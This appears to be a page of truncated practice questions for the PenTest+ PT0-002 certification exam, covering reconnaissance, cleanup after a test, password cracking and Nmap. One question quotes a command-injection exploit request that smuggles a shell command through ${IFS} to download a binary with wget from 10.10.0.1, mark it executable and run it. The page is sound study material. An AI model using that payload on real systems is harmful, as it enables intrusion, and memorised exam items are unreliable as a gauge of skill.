PT0-002 exam

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in...

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)A . Scraping social...

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)A . Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP...

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?A . John the Ripper B. Hydra C. Mimikatz D. Cain and AbelView AnswerAnswer: A Explanation: Reference: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:A . security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting...

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?A . To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a...

A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?A . nmap CoG list.txt 192.168.0.1-254 , sort B. nmap Csn 192.168.0.1-254 , grep “Nmap scan” | awk...

A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running?A . CentOS B. Arch Linux C. Windows Server D. UbuntuView AnswerAnswer: C

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how...